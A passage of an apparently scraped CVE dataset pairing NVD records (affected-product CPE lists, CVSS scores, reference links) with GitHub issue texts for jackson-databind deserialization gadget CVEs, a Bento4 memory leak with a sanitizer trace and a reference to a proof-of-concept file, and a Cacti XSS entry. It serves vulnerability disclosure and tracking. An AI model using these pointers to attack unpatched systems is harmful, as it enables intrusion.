"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2F8ED016-32A1-42EE-844E-3E6B2C116B74",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "A046CC2C-445F-4336-8810-930570B4FEC6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8:*:*:*:*:*:*:*",
"matchCriteriaId": "0745445C-EC43-4091-BA7C-5105AFCC6F1F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9",
"versionEndExcluding": null,
"versionEndIncluding": "17.12",
"versionStartExcluding": null,
"versionStartIncluding": "17.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*",
"matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A7FBF5C7-EC73-4CE4-8CB7-E9CF5705DB25",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "792DF04A-2D1B-40B5-B960-3E7152732EB8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*",
"matchCriteriaId": "46525CA6-4226-4F6F-B899-D800D4DDE0B5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9967AAFD-2199-4668-9105-207D4866B707",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:siebel_engineering_-_installer_\\&_deployment:*:*:*:*:*:*:*:*",
"matchCriteriaId": "25993ED6-D4C7-4B68-9F87-274B757A88CC",
"versionEndExcluding": null,
"versionEndIncluding": "19.8",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F10FB4D-A29B-42B4-B70E-EB82A93F2218",
"versionEndExcluding": null,
"versionEndIncluding": "19.10",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6A4F71A-4269-40FC-8F61-1D1301F2B728",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*",
"matchCriteriaId": "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3A76E5BF-01E4-46E7-8E3B-5ACE75657360",
"versionEndExcluding": "3.11.153",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E9A6D103-9674-4B04-8397-86501F1D91CF",
"versionEndExcluding": "4.6.26",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.10:*:*:*:*:*:*:*",
"matchCriteriaId": "4DBCD38F-BBE8-488C-A8C3-5782F191D915",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D2452F48-6A8B-4274-B0CE-F1256F400170",
"versionEndExcluding": "4.1.18",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | https://github.com/FasterXML/jackson-databind/issues/2097 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | This issue covers following CVEs related to polymorphic deserialization, gadgets:
* CVE-2018-14718: RCE with slf4j-ext jar
* CVE-2018-14719: RCE with blaze-ds-opt, -core jars
* CVE-2018-14720: exfiltration/XXE with only JDK classes (some JDK versions)
* CVE-2018-14721: exfiltration/SSRF with axis2-jaxws
Original vulnerability discoverer:
吴桂雄 Wuguixiong
-----
Fixed in:
* 2.9.7 and later
* 2.8.11.3
* 2.7.9.5
* 2.6.7.3
| Block more classes from polymorphic deserialization (CVE-2018-14718 - CVE-2018-14721) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2097/comments | 11 | 2018-07-27T05:58:22Z | 2019-10-16T04:34:07Z | https://github.com/FasterXML/jackson-databind/issues/2097 | 345,100,313 | 2,097 |
CVE-2018-19360 | 2019-01-02T18:29:00.717 | FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/107985"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHBA-2019:0959"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:0782"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:0877"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1782"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1797"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1822"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2019:1823"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:2804"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:2858"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:3002"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:3140"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:3149"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:3892"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://access.redhat.com/errata/RHSA-2019:4037"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson-databind/issues/2186"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://issues.apache.org/jira/browse/TINKERPOP-2121"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3Cdevnull.infra.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3Ccommits.pulsar.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/bugtraq/2019/May/68"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20190530-0003/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2019/dsa-4452"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5128ECDA-6F9A-42AC-9063-CDFC4C256537",
"versionEndExcluding": null,
"versionEndIncluding": "2.6.7.2",
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B99066EB-FF79-4D9D-9466-B04AD4D3A814",
"versionEndExcluding": "2.7.9.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F4D3858C-DAF3-4522-90EC-EFCD13BD121E",
"versionEndExcluding": "2.8.11.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.8.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E92778FA-5912-46E8-A33B-4BD14935647B",
"versionEndExcluding": "2.9.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.9.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B887E174-57AB-449D-AEE4-82DD1A3E5C84",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E869C417-C0E6-4FC3-B406-45598A1D1906",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7A1E1023-2EB9-4334-9B74-CA71480F71C2",
"versionEndExcluding": null,
"versionEndIncluding": "17.12",
"versionStartExcluding": null,
"versionStartIncluding": "17.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "93A4E178-0082-45C5-BBC0-0A4E51C8B1DE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*",
"matchCriteriaId": "3F021C23-AB9B-4877-833F-D01359A98762",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2F8ED016-32A1-42EE-844E-3E6B2C116B74",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "A046CC2C-445F-4336-8810-930570B4FEC6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8:*:*:*:*:*:*:*",
"matchCriteriaId": "0745445C-EC43-4091-BA7C-5105AFCC6F1F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9",
"versionEndExcluding": null,
"versionEndIncluding": "17.12",
"versionStartExcluding": null,
"versionStartIncluding": "17.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*",
"matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9967AAFD-2199-4668-9105-207D4866B707",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6A4F71A-4269-40FC-8F61-1D1301F2B728",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:automation_manager:7.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D44D4F38-4028-4EAA-895C-1E2816FB36EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:decision_manager:7.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D5CD928F-C9BA-443F-A46D-4FE7756D936B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:jboss_bpm_suite:6.4.11:*:*:*:*:*:*:*",
"matchCriteriaId": "07E373FB-14EA-4EA2-8E4A-0B86A7184B85",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:jboss_brms:6.4.10:*:*:*:*:*:*:*",
"matchCriteriaId": "88C5E02F-C70E-41F4-B146-40C88439017A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*",
"matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/FasterXML/jackson-databind/issues/2186 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | This issue covers following CVEs related to polymorphic deserialization, gadgets:
CVE-2018-19360 (axis2-transport-jms)
CVE-2018-19361 (openjpa)
CVE-2018-19362 (jboss-common-core)
See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem.
Original vulnerability discoverer:
吴桂雄 Wuguixiong
Fixed in:
* 2.9.8 and later
* 2.8.11.3
* 2.7.9.5
* 2.6.7.3
| Block more classes from polymorphic deserialization (CVE-2018-19360, CVE-2018-19361, CVE-2018-19362) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2186/comments | 8 | 2018-11-18T23:39:02Z | 2020-07-31T17:29:54Z | https://github.com/FasterXML/jackson-databind/issues/2186 | 382,014,049 | 2,186 |
CVE-2019-6132 | 2019-01-11T05:29:01.763 | An issue was discovered in Bento4 v1.5.1-627. There is a memory leak in AP4_DescriptorFactory::CreateDescriptorFromStream in Core/Ap4DescriptorFactory.cpp when called from the AP4_EsdsAtom class in Core/Ap4EsdsAtom.cpp, as demonstrated by mp42aac. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/357"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*",
"matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/357 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | there is memory leaks in Ap4String.cpp
./mp42aac poc /dev/null
=================================================================
==15810==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 96 byte(s) in 1 object(s) allocated from:
#0 0x522860 in operator new(unsigned long) (/root/apps/Bento4/mp42aac+0x522860)
#1 0x5c80a5 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) /root/apps/Bento4/Source/C++/Core/Ap4DescriptorFactory.cpp:122:22
#2 0x5f8687 in AP4_EsdsAtom::AP4_EsdsAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /root/apps/Bento4/Source/C++/Core/Ap4EsdsAtom.cpp:76:9
#3 0x5f8687 in AP4_EsdsAtom::Create(unsigned int, AP4_ByteStream&) /root/apps/Bento4/Source/C++/Core/Ap4EsdsAtom.cpp:52
#4 0x5e14cb in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/apps/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:474:20
#5 0x5ddaa0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/apps/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:221:14
#6 0x5d6aa5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/apps/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12
#7 0x56699d in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /root/apps/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115:9
Indirect leak of 32 byte(s) in 1 object(s) allocated from:
#0 0x5229e0 in operator new[](unsigned long) (/root/apps/Bento4/mp42aac+0x5229e0)
#1 0x557d0a in AP4_String::Assign(char const*, unsigned int) /root/apps/Bento4/Source/C++/Core/Ap4String.cpp:165:15
SUMMARY: AddressSanitizer: 128 byte(s) leaked in 2 allocation(s).
[bento4-memory-leak-AP4_String.zip](https://github.com/axiomatic-systems/Bento4/files/2746334/bento4-memory-leak-AP4_String.zip)
| memory leaks in Ap4String.cpp | https://api.github.com/repos/axiomatic-systems/Bento4/issues/357/comments | 1 | 2019-01-10T17:00:31Z | 2019-01-12T09:36:13Z | https://github.com/axiomatic-systems/Bento4/issues/357 | 397,925,621 | 357 |
CVE-2018-20723 | 2019-01-16T16:29:00.510 | A cross-site scripting (XSS) vulnerability exists in color_templates.php in Cacti before 1.2.0 due to lack of escaping of unintended characters in the Name field for a Color. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
